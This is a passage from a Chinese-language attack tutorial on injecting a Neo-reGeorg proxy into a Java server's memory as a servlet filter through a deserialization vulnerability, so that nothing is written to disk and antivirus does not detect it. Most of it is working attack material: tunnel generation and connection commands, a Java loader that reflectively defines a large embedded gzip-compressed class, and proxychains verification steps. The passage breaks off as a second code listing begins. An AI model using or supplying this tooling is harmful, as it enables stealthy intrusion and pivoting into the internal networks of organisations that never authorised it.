• 序列化反射filter添加Neo-reGeorg内网代理


    前言:

    当目标服务器的网络环境比较苛刻时,可以选择通过 filter 添加 Neo-reGeorg 进行内网代理。这样做的好处是:filter 是通过反序列化漏洞添加并驻留在内存中的,无文件落地,可以防止杀软查杀。

    基础:

    首先需要了解如何使用 Neo-reGeorg,其下载地址如下:

    https://github.com/L-codes/Neo-reGeorg

    首先使用Neo-reGeorg生成对应服务器代码

    python neoreg.py generate -k password

    然后将生成的jsp修改为java文件,代码如下:

    1. package com.example.seriallzpayload.service;
    2. import javax.servlet.http.HttpServletRequest;
    3. import javax.servlet.http.HttpServletResponse;
    4. import javax.servlet.ServletOutputStream;
    5. import javax.servlet.http.HttpSession;
    6. import java.io.IOException;
    7. import java.io.PrintWriter;
    8. import java.net.InetSocketAddress;
    9. import java.nio.ByteBuffer;
    10. import java.nio.channels.SocketChannel;
    11. import java.rmi.UnknownHostException;
    12. public class reGeorg_tunnel {
    13. public static java.util.Map<String,Object> namespace = new java.util.HashMap<String,Object>();
    /**
     * Inflates a gzip byte array fully into memory; used below to unpack the embedded,
     * gzip-compressed class file before it is defined via {@link #loader(byte[])}.
     * Reads in 256-byte chunks until the stream reports end-of-data. The byte-array
     * streams are never explicitly closed (harmless, they hold no OS resources).
     * Any malformed gzip input surfaces as an exception from the GZIPInputStream
     * constructor or from read().
     */
    14. public static byte[] unGzip(byte[] bytes) throws Exception{
    15. java.io.ByteArrayOutputStream out = new java.io.ByteArrayOutputStream();
    16. java.io.ByteArrayInputStream in = new java.io.ByteArrayInputStream(bytes);
    17. java.util.zip.GZIPInputStream ungzip = new java.util.zip.GZIPInputStream(in);
    18. byte[] buffer = new byte[256];
    19. int n;
    20. while ((n = ungzip.read(buffer)) >= 0) // read() returns -1 at end of the gzip member
    21. out.write(buffer, 0, n);
    22. return out.toByteArray();
    23. }
    /**
     * Turns raw class-file bytes into a loaded Class by reflectively invoking the
     * protected ClassLoader.defineClass(byte[], int, int). The method name is spelled
     * out as a byte array that decodes to "defineClass" instead of a string literal.
     * The defining loader is a throw-away URLClassLoader with no URLs whose parent is
     * the thread context class loader, so the class is created from memory only and
     * is never backed by a classpath resource.
     * Returns the raw (unchecked) Class; reflection or bytecode-verification errors
     * propagate to the caller.
     */
    24. public static Class loader(byte[] bytes) throws Exception {
    25. java.net.URLClassLoader classLoader = new java.net.URLClassLoader(new java.net.URL[0], Thread.currentThread().getContextClassLoader());
    26. java.lang.reflect.Method method = ClassLoader.class.getDeclaredMethod(new String(new byte[]{100,101,102,105,110,101,67,108,97,115,115}), new Class[]{byte[].class, int.class, int.class}); // bytes decode to "defineClass"
    27. method.setAccessible(true); // defineClass is protected
    28. Class clazz = (Class) method.invoke(classLoader, new Object[]{bytes, new Integer(0), new Integer(bytes.length)});
    29. return clazz;
    30. }
    31. public static void Mytunnel(HttpServletRequest request, HttpServletResponse response) throws Exception{
    32. try{
    33. String charslist = "8z4lBs+92ucIAJtnON0CELaMZ5H3/eg6KDFjqPpyfxdvrSiTW1wQhbGmVkXY7UoR";
    34. Object[] args = new Object[]{
    35. request, //0
    36. response, //1
    37. charslist.toCharArray(), //2
    38. new byte[]{-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,6,-1,-1,-1,28,18,49,8,27,2,25,31,60,0,7,-1,-1,-1,-1,-1,-1,-1,12,4,19,33,20,34,54,26,11,13,32,21,23,17,16,37,51,63,45,47,61,56,48,58,59,24,-1,-1,-1,-1,-1,-1,22,53,10,42,29,40,30,52,46,35,57,3,55,15,62,38,36,44,5,14,9,43,50,41,39,1,-1,-1,-1,-1,-1},//3
    39. new Integer(200),//4
    40. new Integer(513),//5
    41. new Integer(524288),//6
    42. "n4BSI0z90MDONaJ5HhNyAhrWZaPxel/V3hDLCGb9J+VvZLPr/EAb3a1vCGq1tMPJAasIL+PuEG1a/aPyCPEvZpNTay52LpufgjJGLmfVeQJZHESxCpbN24hSnK==",//7
    43. new Integer(2047140399),//8
    44. new Integer(0),//9
    45. new Integer(0),//10
    46. new Integer(0),//11
    47. };
    48. if(namespace.get(charslist) == null){
    49. byte[] clazzBytes = unGzip(new byte[]{31,-117,8,0,-46,68,-86,100,0,3,-99,57,11,124,83,-11,-43,-25,36,-9,-26,-34,-92,-105,-110,6,46,112,91,74,75,11,88,-46,-44,42,104,-44,20,80,40,69,42,109,113,13,80,-47,57,9,-19,109,-119,-92,73,77,82,94,115,76,55,31,-101,-113,77,-25,54,7,78,69,-60,101,78,84,68,13,69,4,-15,-123,-50,-73,-50,109,78,-73,-87,123,-22,-26,-90,115,110,-50,61,-20,119,-50,125,-92,73,27,-10,-15,125,-65,31,-3,63,-50,-1,-4,-49,-5,127,-50,-71,-31,-103,79,31,58,4,0,39,58,36,15,-108,-64,27,18,-4,92,-126,123,-35,112,23,-4,66,-126,-5,120,-2,-91,4,111,122,64,-126,-73,36,120,91,-122,95,73,-16,107,15,65,127,35,-63,111,101,-8,-99,12,-65,-105,-31,29,9,-34,-11,64,25,-4,-127,-121,63,74,-16,-98,7,38,-62,27,60,-4,-55,3,110,-8,51,-81,-34,-25,-43,7,60,-4,-123,-121,15,-103,-58,95,-103,-20,71,-68,-6,-101,4,127,-9,64,21,99,-115,-125,-113,121,-8,7,15,-97,-56,-16,79,-58,-2,23,-29,-4,91,-122,-1,-56,-16,-87,4,-61,30,-104,-115,-64,3,74,-24,-16,64,0,-99,60,8,18,-118,30,-72,17,93,30,104,68,73,70,-39,-125,110,-12,72,88,-62,-77,-62,-61,56,62,41,-107,113,-68,-124,94,15,-106,-95,-113,-121,9,37,56,17,-43,18,-100,-124,-109,121,-104,34,-93,70,-36,-80,-100,73,86,-16,48,-107,-73,-107,60,76,35,89,-80,-54,-125,-43,56,-99,6,18,-111,-122,79,24,-91,-90,4,107,113,70,9,-50,68,85,-58,89,-116,117,-100,-116,117,124,50,91,70,63,-49,-11,60,4,120,104,-112,-15,120,9,27,61,-80,-110,76,-124,39,-32,-119,-76,-62,57,-68,125,95,-58,-71,100,17,60,-119,9,-100,44,99,80,-58,83,120,127,-86,7,98,120,26,15,33,9,-101,60,-80,22,-25,121,112,62,46,96,-56,-23,-28,33,60,-125,-39,47,-108,113,-111,-116,-51,50,46,-26,93,-117,-124,75,8,9,62,-31,-51,-103,50,46,-11,96,43,-98,-59,55,-106,-15,-86,-51,-125,-19,-40,-63,-100,-105,-53,120,54,67,62,-61,67,39,15,97,-58,90,33,-31,74,15,108,97,47,110,-63,85,50,118,-15,124,-114,-116,-85,25,-8,62,95,60,-105,-121,-13,100,-4,44,75,123,62,15,-97,99,-105,92,-32,-127,-85,112,77,9,-100,-122,17,30,-42,74,-40,-51,-112,30,9,117,9,123,61,112,13,-10,49,-18,58,9,-93,30,-72,-114,99,-29,58,-68,-112,-121
,-11,108,-31,24,15,-3,60,-60,37,76,80,64,-30,0,-69,-12,34,55,-103,33,41,97,-54,13,55,-15,-100,118,-61,-51,-104,100,-76,65,62,-34,-32,-63,-115,-72,-119,-121,-51,60,108,-111,-16,-13,30,-40,-59,-78,-17,-62,-117,121,-8,-126,-124,91,37,-4,-94,7,-18,-92,0,-57,75,36,-68,84,-62,47,33,56,-12,56,13,-25,53,-45,-48,-93,-13,106,17,-126,-100,-46,83,-87,104,34,-98,66,24,-33,118,97,100,67,-92,113,48,29,-115,53,-74,71,6,-102,16,-36,-31,104,95,60,-110,30,76,18,-10,-55,-123,-89,-13,-52,109,44,18,-17,107,12,-89,-109,-47,120,95,83,30,100,-7,-38,11,-11,-18,116,-45,2,-94,-31,-102,23,-115,71,-45,11,16,-100,117,-77,87,33,8,-51,9,-26,-19,-46,47,26,-116,-60,-120,-87,90,55,-10,-38,-20,115,17,-60,-75,-63,-109,88,-36,73,117,-25,45,-102,61,-106,-105,-119,-64,-108,38,-43,-115,61,-99,-51,-102,-71,-41,-23,-111,30,61,-71,94,-33,-116,48,-85,24,82,49,-86,-98,-106,77,-35,-6,64,-38,52,-120,20,77,-59,18,-35,-111,-40,40,41,-19,-5,36,-91,103,109,108,-61,5,61,122,-73,-95,-109,-97,68,-51,67,107,-115,-89,-11,62,61,73,-62,-116,-43,-48,-70,-87,-57,115,55,-57,-30,20,37,69,122,41,-47,-8,-122,-60,122,-67,93,79,-81,75,-12,32,44,43,98,-64,-79,-62,22,-95,63,-69,-104,88,-29,-14,-119,-49,65,56,-1,-1,76,-67,57,22,73,-91,-114,-103,-97,59,25,-119,-9,44,-38,-100,-42,-55,-36,-82,-70,-42,86,67,67,-49,90,6,-84,72,-112,-38,-28,103,14,-128,86,2,70,-29,-23,21,9,11,85,-84,51,49,93,27,-12,100,-76,-105,28,-36,88,-60,65,6,100,83,99,92,79,55,-90,82,-79,-58,112,-72,45,108,-58,-70,-31,58,95,-9,58,-67,123,125,115,44,-86,19,-35,-28,96,42,-83,-109,49,67,-74,35,82,122,-9,96,50,-102,-34,-36,-40,-83,39,-45,-115,-25,-100,124,-62,105,-51,-76,-120,-10,70,-69,35,105,-67,-120,5,102,-81,-110,-16,-53,54,-47,-80,-98,36,-71,114,68,125,125,122,122,97,55,-121,-107,-34,-45,-102,74,13,-22,73,-46,-32,-72,-70,-39,-57,-60,-118,94,-24,-68,-18,-104,-15,-124,20,-56,-62,62,-124,9,69,108,-85,-64,61,112,-81,2,123,-32,62,-124,-78,49,113,-93,-32,101,120,57,-126,119,-76,-44,100,126,18,-83,-117,-104,-21,-55,-126,99,-109,-86,2,79,-61,15,17,74,13,120,52,-47,104,35,2,-31
,-46,-67,-26,4,81,-113,-89,-37,-12,120,95,122,29,-95,17,-88,53,62,48,-104,38,-38,122,-92,-97,-28,-76,-17,-27,65,21,-68,2,47,87,-16,74,120,17,97,-14,104,113,22,13,70,99,61,44,-19,87,-16,-85,-92,43,94,-91,-32,-43,120,-115,-126,-41,-30,-41,20,-4,58,-33,-69,22,-81,83,-32,32,28,82,-16,122,-4,-122,2,79,-64,-109,54,27,-125,76,-18,-19,42,120,3,126,83,-63,111,-63,62,5,-65,-51,54,19,86,116,-82,108,81,-16,70,-4,-114,2,-113,-63,-29,20,64,73,61,-91,-89,77,3,-40,47,73,49,40,113,-72,-84,-20,108,99,1,-120,-60,54,-36,-114,80,-98,59,88,-102,78,15,-48,33,-87,30,39,3,25,-100,110,98,-76,-17,-30,-51,8,-43,-123,-15,-58,-72,-87,81,-56,-73,-64,67,10,-34,-118,59,40,27,82,56,74,120,-101,-126,59,-15,118,-117,-61,-56,85,35,116,-38,35,-15,-120,-31,-68,93,120,-121,-126,-33,-61,-116,-126,-33,-57,59,77,67,47,53,82,91,71,-92,-97,31,-125,106,-120,103,36,-26,-106,-8,96,-65,-98,-116,48,51,9,127,-96,-32,93,-72,91,-63,-69,-15,30,9,-17,85,112,15,-34,39,-31,94,5,-17,-57,7,20,124,16,-77,-90,-10,38,41,5,30,-127,-61,10,-18,-61,33,5,-9,-29,67,10,28,-127,-89,20,56,0,15,43,120,0,31,-106,-16,32,-101,-108,-20,-2,8,30,-106,-16,81,5,31,-61,-57,37,124,-126,-124,-79,-94,-96,-63,12,3,5,-97,100,-21,-106,-83,-96,103,-99,-22,-43,-109,13,45,-100,-31,-56,-73,10,30,-127,-61,-60,48,-107,99,-120,79,-111,71,-31,29,124,90,-63,31,-30,-45,-26,81,56,77,-59,-122,52,-86,-76,67,-121,-97,-5,-62,100,50,-78,121,-7,96,58,23,68,18,62,-93,-32,-77,-8,28,-117,116,21,93,-116,-12,-12,-40,52,-81,-90,0,-63,-25,-15,26,-124,18,-61,-63,-117,6,123,123,57,100,-91,-26,-27,29,29,45,-51,43,20,124,-127,66,0,95,-60,-105,20,124,25,95,-55,119,109,43,13,-31,68,-9,122,122,-85,61,61,116,57,-59,17,-16,35,9,95,85,-16,-57,-8,19,5,127,-118,-81,41,-80,23,-18,87,-16,103,-8,58,21,-49,-27,-53,40,-84,-106,44,108,109,-93,-44,-76,-72,53,-100,99,-16,6,-2,28,-95,-54,36,75,26,116,-81,-117,-112,-5,99,-87,70,-109,118,-77,-71,85,-16,23,-116,38,116,-74,44,92,44,-31,47,21,124,19,-33,-94,103,-127,111,43,-8,43,54,-9,-81,21,-4,13,-2,86,-63,-33,-31,-61,36,-4,-110,-27,-99,93,11,59,23,
51,-25,-33,43,-8,14,31,-68,-53,62,-68,1,-33,-90,-6,55,-10,25,-79,-50,-4,-118,-2,64,98,-50,-97,-49,-85,63,34,-32,124,86,-24,61,-66,-11,30,-19,26,20,-4,19,-2,89,-63,-9,-7,-123,125,-64,-61,95,-16,67,5,-1,-54,116,63,-30,-40,-48,114,-106,-23,-48,-45,27,19,-55,-11,-100,76,-110,-67,-111,110,93,-63,-65,-31,-121,8,19,11,76,103,25,-51,-114,70,27,124,-110,109,76,-4,59,-15,-128,-3,-16,16,-62,-44,49,-34,45,-56,16,87,26,25,2,63,86,-32,5,120,81,-127,-25,-32,121,5,94,-126,-105,-87,63,25,85,100,20,-4,7,126,-94,-32,63,-15,95,10,-2,27,-1,99,103,42,3,-95,45,-63,-23,45,-17,70,120,93,34,73,25,-19,25,120,86,-127,79,-15,83,9,-121,21,7,-112,-78,14,-60,-101,21,-121,-61,-31,-76,19,-96,-15,-114,58,-87,42,37,-6,21,-121,-32,16,21,-121,-117,-93,-84,-26,127,-49,-43,118,-22,53,40,44,-115,-92,-42,81,-101,68,-63,-47,-95,39,-110,-6,-103,52,-112,64,-45,70,-91,-120,68,42,29,-89,71,-68,-118,-85,88,-108,3,117,20,2,115,-56,79,6,84,55,-118,-56,-111,39,67,46,5,82,-35,-96,-126,-71,42,18,27,-44,-115,-42,-85,-107,31,-54,-122,72,52,22,89,27,35,-120,64,-74,-90,-108,-25,-118,12,12,-24,113,90,52,28,83,-125,100,101,-24,38,-85,42,83,59,39,-89,19,118,45,-103,88,87,-76,-93,114,-89,6,-41,-90,44,-108,73,92,-31,-117,33,-71,98,86,21,81,-21,-118,35,72,27,88,-109,-27,-67,6,-115,124,12,-69,53,34,-111,54,114,125,58,74,-81,70,-94,-118,-67,-79,-63,20,-79,16,-69,99,-119,20,-31,-71,-69,19,-3,3,-111,-92,-66,34,113,-108,59,100,-78,-46,4,-103,103,36,-127,83,-66,-80,-107,-76,-54,-60,-56,25,73,-32,-91,-116,-45,73,-115,-83,-98,-54,-43,-108,18,2,45,78,-104,-39,-117,-84,94,119,46,75,-30,-119,-90,90,-29,-87,116,36,-34,77,98,76,-32,-108,56,38,14,106,-21,70,117,47,-93,81,12,-107,-90,20,-30,80,73,49,-46,-15,38,98,85,98,-108,99,-101,-55,-15,71,117,111,-79,-37,-92,-118,-64,29,7,66,-105,-43,15,-115,96,45,-45,55,91,-79,-40,52,-6,40,63,80,-101,70,-11,54,97,94,-24,-26,-77,50,68,-25,14,-62,76,-119,75,34,-35,-23,68,-110,122,-72,-102,-70,34,34,21,-32,52,-103,-26,26,13,46,98,-82,49,55,-103,103,94,-95,108,78,-60,98,-90,-33,40,101,9,-79,104,42,61,98,-92,
-47,-107,-44,126,8,6,-36,-56,87,109,-124,-49,65,-103,-44,-87,-49,-29,88,-102,-112,127,-43,56,101,126,-91,-123,48,126,-110,105,-90,-103,72,114,24,-25,83,109,-75,-32,68,-44,55,22,74,-100,-42,69,82,29,-122,95,-23,41,83,-13,42,-60,-115,77,-31,-109,-53,53,-43,-66,-111,56,60,59,73,17,-100,76,111,-26,-122,-13,40,29,-14,-104,-121,50,-98,92,-109,95,111,41,-50,108,62,-108,-76,-13,79,-72,59,37,100,-85,41,23,-22,-116,-98,124,98,49,76,82,-127,50,6,-67,126,-117,-66,89,-80,-105,68,-11,88,15,-35,44,43,48,-122,-7,-19,57,-82,0,64,41,-126,62,-28,-62,-36,-78,21,34,19,-88,16,-39,-64,-15,-102,-97,-105,-83,125,113,-54,-67,-51,17,118,81,105,33,87,83,-116,78,61,53,64,33,-96,-101,31,-91,-109,-13,-44,-52,43,73,77,-26,-27,-106,100,50,-111,-76,-75,-55,-17,-91,55,83,-101,-33,-49,-23,-107,67,-93,59,49,-80,-103,63,-24,-58,-6,-91,-75,8,-56,-80,-121,64,-90,-89,-5,50,37,-93,-108,110,124,-13,8,-100,118,56,-86,-19,100,115,-44,70,-126,115,103,-54,0,112,16,-26,-27,38,19,-85,-87,-8,-9,-79,-23,-122,81,-72,-28,-94,110,51,-101,81,-119,-82,27,77,-55,-86,-29,-26,-43,50,66,-20,-115,-10,-47,-117,94,68,31,-56,-21,-115,-36,94,71,-71,-83,-104,-76,58,-65,51,46,58,35,18,59,-115,100,120,-22,127,-1,-76,-4,111,95,-115,-50,62,22,119,86,17,2,69,-47,93,73,-67,63,-79,65,-73,-65,21,-30,86,-21,97,55,-121,114,36,-58,-97,-7,92,59,-90,-28,-118,75,33,82,19,31,21,61,-32,42,33,26,-98,-49,89,-108,17,44,-46,84,107,-12,72,50,-33,53,-71,67,34,89,-110,78,-28,90,32,106,-72,70,126,-23,24,-61,92,-24,-115,69,-23,13,40,-108,6,58,-11,-2,8,37,103,54,121,69,93,115,-79,26,109,-35,9,28,99,73,-73,89,-44,25,-82,21,83,3,49,-50,-4,-59,-46,69,-63,47,25,-71,-46,76,90,-84,-92,46,34,105,62,51,-87,-49,44,103,-108,7,104,53,-70,117,76,-79,-102,-7,-49,55,63,-51,-110,1,73,-65,118,122,-79,45,49,-67,-97,62,42,8,-69,-124,19,-99,-75,53,-117,70,94,-77,-55,-28,74,45,126,-71,-2,-45,-54,51,-83,102,106,50,26,-59,60,-5,-113,116,-113,92,-81,-93,-87,-123,-87,20,-1,-60,69,-31,-71,36,-103,-24,-25,-116,58,6,-49,-56,-73,43,86,-97,-35,66,113,95,-124,-56,25,69,12,53,-10,-9,-11
2,124,-10,73,-67,-105,-33,68,-93,-39,35,52,89,101,-68,-40,25,-1,-40,-109,-30,-97,14,72,74,-93,109,27,-105,50,127,74,-80,-9,46,-13,-25,26,-124,-45,-118,-68,-123,99,-3,13,70,98,27,-101,121,-89,-50,48,-100,-101,1,70,82,-121,-23,112,23,-108,-128,3,118,-61,-35,-32,-92,-7,30,-72,23,-128,-26,61,112,31,-51,110,-2,32,2,-124,7,12,-40,-125,-32,-93,117,22,-10,-47,56,68,-112,50,-102,-111,102,-47,79,16,70,-25,95,14,-24,11,-64,60,118,-67,5,46,56,-114,-26,-117,-21,15,-125,-125,-2,-75,7,-100,115,58,2,-62,-100,-112,-32,15,-120,115,14,-125,-109,-2,61,8,-76,113,-47,70,-92,127,15,-126,43,32,-47,90,-54,-126,28,20,3,-78,-67,116,5,-68,46,123,45,5,-68,-116,-30,14,-55,1,111,14,-63,29,-16,-70,-19,-75,39,-32,-11,-40,-21,-110,-128,-73,-60,94,43,66,112,-100,24,44,117,5,-57,75,65,-81,28,44,-13,-70,-126,62,-81,20,-100,64,-21,-119,94,119,80,-43,4,-97,-57,121,16,74,-122,64,57,12,-29,66,-109,-68,117,-76,9,77,54,-89,41,-66,-46,-112,70,127,-27,13,-66,-15,57,36,-55,-92,-20,-72,21,-18,-94,-93,-118,6,-97,55,119,84,22,-102,-86,77,-51,-126,47,88,-87,86,58,118,-128,43,3,-89,-88,-107,15,-53,-95,105,-38,84,109,90,22,38,-104,-80,-38,3,48,113,-11,62,80,-75,-118,44,76,58,0,-18,-43,-38,-76,125,48,-103,-42,89,-104,18,-86,-56,12,63,-94,122,-124,29,16,-46,42,-100,106,73,22,-76,-112,-90,85,48,106,-71,-86,-12,24,51,-61,-54,-75,10,62,-84,8,-47,-111,-45,62,-27,-125,10,63,-17,-90,-122,42,-75,74,-43,61,4,-107,67,48,45,52,57,99,32,78,-30,-109,-22,44,76,-41,-120,83,13,15,-75,-50,-35,-38,100,117,-94,97,88,34,116,-60,113,5,109,85,99,75,-118,-8,102,100,97,-26,54,80,12,-118,-77,-74,59,-94,-116,-117,97,70,-95,81,-16,29,103,-23,-35,-43,-32,-85,-53,-103,-64,29,-86,60,0,-77,87,107,21,-5,-64,79,122,-109,-42,20,6,-127,80,-107,86,-91,85,102,-95,65,-85,18,-78,112,-68,-81,81,-85,-54,-62,9,-37,-128,-26,-61,-48,-24,-49,-62,-119,-66,57,67,48,55,84,-83,85,-93,112,16,78,90,-19,-12,-121,49,11,39,27,-57,26,-55,28,-52,-62,41,13,-66,83,115,108,78,99,-44,33,8,-123,-90,107,-45,-121,-96,73,-101,-66,31,-26,33,-124,106,-76,-102,-3,48,31,97,27,-52,-31,
-43,2,4,-106,-88,-74,-63,119,58,81,45,89,-19,-44,106,-61,-106,-108,51,72,-96,-38,33,56,67,35,37,23,102,-122,-97,41,-18,-31,21,44,-25,-94,80,77,6,-92,16,25,-53,118,-100,70,-50,-14,-109,29,76,3,55,103,97,49,1,-76,114,-53,-123,-75,90,109,22,90,-120,67,-115,54,-61,-87,-51,56,-108,-123,37,90,77,22,-50,-28,97,41,19,108,-35,15,103,-15,-117,89,86,32,-15,89,-7,18,107,-75,71,32,-88,-43,-6,-38,-78,-48,-66,29,2,-76,-22,48,86,53,44,118,22,-106,19,117,-63,119,-74,104,43,-75,90,-48,102,-80,102,93,-103,-31,-67,-52,-31,51,101,120,-35,78,24,-57,-53,78,-106,126,38,-81,-62,-52,-20,41,-48,-24,-26,10,-45,28,-86,72,10,24,-9,-100,-69,-53,4,-96,72,-99,113,0,86,-110,-118,-85,66,51,89,122,10,-39,-43,-63,90,-78,-61,52,-75,-106,14,103,-79,62,-77,-100,42,-39,-83,75,-101,-87,-51,-54,-62,57,-103,-31,-41,-75,-103,89,88,77,103,-126,-17,92,83,30,95,27,-53,67,-89,-27,67,112,-98,65,125,-124,-93,33,-100,-51,-108,34,-110,-80,62,59,58,34,5,-33,-7,118,100,21,19,-107,-20,94,106,-121,-24,17,-4,-104,-74,-29,-115,109,37,69,-20,-25,40,98,-73,3,7,-86,-49,-128,77,-93,-43,4,94,13,-63,5,-63,-86,33,88,-61,97,-109,-123,-56,1,88,75,-81,78,-83,-38,7,-35,101,37,67,89,-24,-47,-86,-99,89,-48,-69,-10,66,-81,86,-87,85,-17,-121,62,39,-87,56,69,-11,-6,-42,-123,51,-104,34,58,-68,-114,-122,105,42,-29,-104,-82,38,-24,-7,-60,-17,66,-125,95,-125,113,109,63,-84,119,-112,-13,98,102,-44,71,-78,-48,-97,1,49,84,101,-99,-59,29,-48,-107,-63,-39,116,39,97,-36,-71,107,-52,-99,35,-80,81,117,13,-63,0,-67,-107,105,108,-90,-117,-126,-43,-86,20,-100,-18,12,-42,-40,62,-87,85,-85,111,-127,78,-75,-102,-3,-60,24,73,-118,46,-89,90,-51,-34,-88,101,103,-99,-61,-64,84,-105,90,-93,86,-81,9,-46,-96,-70,110,3,15,-19,-90,-33,6,94,-110,124,28,71,78,58,-100,-127,-15,57,6,-103,-31,123,109,45,97,18,49,-50,-45,-78,-54,-48,18,54,-110,-60,-125,-122,-60,-3,-93,37,-98,-84,-114,-77,50,56,63,-17,67,44,58,89,-105,47,110,-24,98,43,111,52,-58,77,-37,-96,-108,-8,-47,106,51,69,-25,7,57,118,-45,-118,-80,-77,13,-89,-47,-21,-102,82,-16,-70,-14,34,36,3,85,-102,-111,54,-3,-102
,76,-103,-50,72,-99,5,-57,66,-69,115,55,21,-73,103,-15,42,-68,22,-86,28,79,56,-98,117,-68,0,85,-62,22,-31,41,-31,25,-102,63,17,81,20,-96,74,108,16,-17,22,-9,-48,-4,-90,107,-86,-85,10,-86,-88,-120,-19,114,109,-122,42,-68,-61,-15,50,-49,-114,87,-100,119,-13,-20,-68,71,8,-14,44,-100,-30,-38,-64,-77,81,-19,14,-64,-61,102,-75,-61,73,32,-126,76,-77,-25,0,108,33,39,125,-66,-67,-2,-48,2,103,80,80,-123,-54,-99,-16,81,-67,42,92,38,-32,-36,50,24,-34,26,20,9,-76,3,-22,3,-2,7,64,80,69,-15,-30,-109,-78,112,113,-105,-75,115,109,-107,54,-103,123,-33,23,-78,-80,-75,43,3,-5,-13,-81,-70,-116,-85,45,71,-67,-86,-70,-54,-32,-125,-83,-46,-59,-105,-28,29,-72,-68,-29,-73,-118,54,-47,47,-102,68,123,-14,-119,74,-1,15,114,-86,84,6,-121,-73,122,93,5,71,-110,-9,-12,-83,-58,54,51,-84,4,-78,112,-55,30,-85,35,56,8,-121,44,27,-7,64,0,15,-51,-82,122,-54,-117,-19,-127,67,11,56,-96,43,-9,-63,-91,33,-63,73,118,17,-55,84,-17,16,41,87,64,21,47,19,113,-18,92,82,-104,97,110,-43,-27,-72,117,-8,93,26,-115,-78,-7,100,1,-118,100,-95,72,6,-118,100,-94,-20,-44,72,82,22,-45,123,2,-53,-97,-123,47,89,-8,65,89,-107,-67,-13,119,-128,91,-93,-14,-109,-34,-61,-108,84,-103,-95,38,17,74,-11,-61,-81,-47,104,16,57,95,99,-99,-58,-77,33,100,-17,-68,-83,98,1,29,-73,-22,30,77,-57,-51,80,-109,-114,-37,-96,-29,54,-23,80,107,-95,-54,46,-78,-42,38,-43,-51,36,50,-61,83,-52,91,-122,125,100,-2,97,-98,-102,43,110,-88,82,100,31,23,-51,125,-66,-46,54,-65,-17,-53,89,-72,-116,-115,100,71,-47,-46,-128,74,-51,-109,104,-43,-98,122,-82,52,-94,-109,8,81,17,-70,-36,-40,-48,-70,-62,44,61,109,121,72,76,-57,-128,-111,-57,51,-61,67,-11,78,2,-106,11,-36,35,-104,2,60,74,127,2,57,-120,3,-6,49,120,-36,18,101,61,117,-125,18,-51,23,112,17,-81,-89,26,-98,-123,43,-38,-121,-32,-54,-114,-122,-3,-16,21,-82,82,103,-46,-30,-85,92,-92,-82,10,9,-84,-50,-43,33,81,19,-83,-77,58,94,25,-121,-41,-124,92,-102,-21,81,-72,118,27,-108,105,-82,44,124,-115,-30,-30,-21,-37,64,20,118,103,-122,95,-51,12,103,-23,125,22,-118,-32,-26,-1,-13,-79,-38,-53,107,-23,69,81,-76,-64,-91,70,
15,-42,-18,92,-32,63,20,20,36,-54,121,-82,3,112,-35,106,-22,57,-81,15,73,-107,-86,-80,19,34,26,85,-23,111,4,69,77,-46,92,78,-51,69,117,-10,-122,46,-115,50,-24,55,73,83,-71,-121,93,78,-105,-36,116,-22,118,106,110,-29,-76,-110,96,107,-42,44,80,69,97,23,53,76,-94,-41,125,59,76,32,-49,26,61,-104,-101,18,9,-91,37,55,-19,53,119,56,51,124,107,-64,-76,-109,-101,-1,-53,-60,18,-19,106,18,-105,-83,-77,-47,-17,-108,-67,19,-121,-32,91,97,-65,-9,56,107,101,37,105,-110,-73,-46,127,104,39,116,-6,43,-25,28,-127,37,52,-78,-99,30,5,-9,54,-54,-63,2,85,34,110,13,-60,12,-43,102,-63,-54,-99,98,-96,-110,3,76,19,15,-79,-36,107,-122,-32,-37,-108,-55,105,-53,-43,-107,-114,93,-105,57,-55,127,-9,4,-116,-56,65,-24,-124,62,-72,-48,112,-102,-101,-1,27,-49,114,91,-52,-118,-96,53,-127,67,7,-31,-58,14,35,116,2,36,-59,50,-114,-99,44,124,39,36,-6,36,-90,-72,109,27,-108,-20,-123,-19,44,-64,12,-33,77,35,-112,-17,50,-60,-25,-69,-39,-126,-56,123,-31,-106,-112,-40,-96,10,-102,24,54,-62,-25,1,127,125,67,96,8,110,29,29,58,110,-2,-31,-35,-110,-31,68,10,29,-106,97,-90,-97,25,-110,-46,-11,36,-13,14,14,-113,44,-36,-74,-99,-98,12,7,-22,78,77,-12,55,100,-31,-10,-79,-124,-98,-125,-25,45,43,31,79,-124,68,-102,-87,-18,-19,34,-109,-34,-47,30,-88,40,-17,17,-42,100,-31,123,-27,107,22,112,59,45,4,56,-14,50,-102,96,123,-24,5,120,-47,-70,123,-118,-15,53,3,80,-17,119,25,105,-50,47,26,-109,87,-34,116,-119,95,48,-105,94,90,58,-51,-27,-108,77,-105,-52,-85,-40,109,17,121,9,94,-74,-120,-100,78,66,49,-111,-71,20,117,109,-11,-82,114,-58,-67,126,69,-67,88,-18,-107,-73,88,107,-95,-36,-21,-75,-41,-50,114,-17,20,123,109,39,-65,87,-32,71,22,-79,82,-102,-99,52,59,-124,-35,-42,-39,-85,-16,99,-53,100,-29,-24,-113,-49,-84,-81,40,-37,28,63,-95,-65,-97,30,11,-46,107,-16,-77,-47,-33,100,-44,57,125,-33,-50,48,-81,-25,62,-39,38,27,-6,0,-108,28,-128,59,-55,-92,63,-72,31,122,77,106,-16,63,-22,-91,95,93,55,37,0,0});
    50. Class clazz = loader(clazzBytes);
    51. namespace.put(charslist, clazz.newInstance());
    52. }
    53. namespace.get(charslist).equals(args);
    54. }catch (Exception e) {
    55. e.printStackTrace();
    56. }
    57. }
    58. }

    运行后使用以下命令访问,确认代理是否成功(注意:这里 -k 指定的密钥应与前面 generate 时使用的密钥保持一致):

    python neoreg.py -u http://192.168.4.147:8081/reGeorgtunnel -k galaxy -p 1234 -l 192.168.4.147

    可以看到代理成功: 

    下面测试代理是否可用。首先在本地通过 python 搭建一个简单的 HTTP 服务器:

    python -m http.server --bind 127.0.0.1 8811

    然后在 kali 中通过 proxychains 进行访问,首先配置 proxychains:

    vi /etc/proxychains4.conf

    需要注意,Neo-reGeorg 使用的是 socks5 协议,proxychains 配置为其他协议会报错。

    然后使用kali通过代理访问本地通过python搭建的简单服务器,如果能访问则整个代理成功:

    proxychains curl http://127.0.0.1:8811

    访问成功,证明修改后的代码没有问题。下面对代码进行修改,实现通过添加 filter 来访问:

    添加filter访问:

    这里既可以使用前面加密的版本,也可以基于其中的 NeoreGeorg.java 进行开发。我选择基于 NeoreGeorg.java 编写,直接修改源码便于二次修改;当然也可以使用加密的版本:

    1. package com.example.seriallzpayload.service;
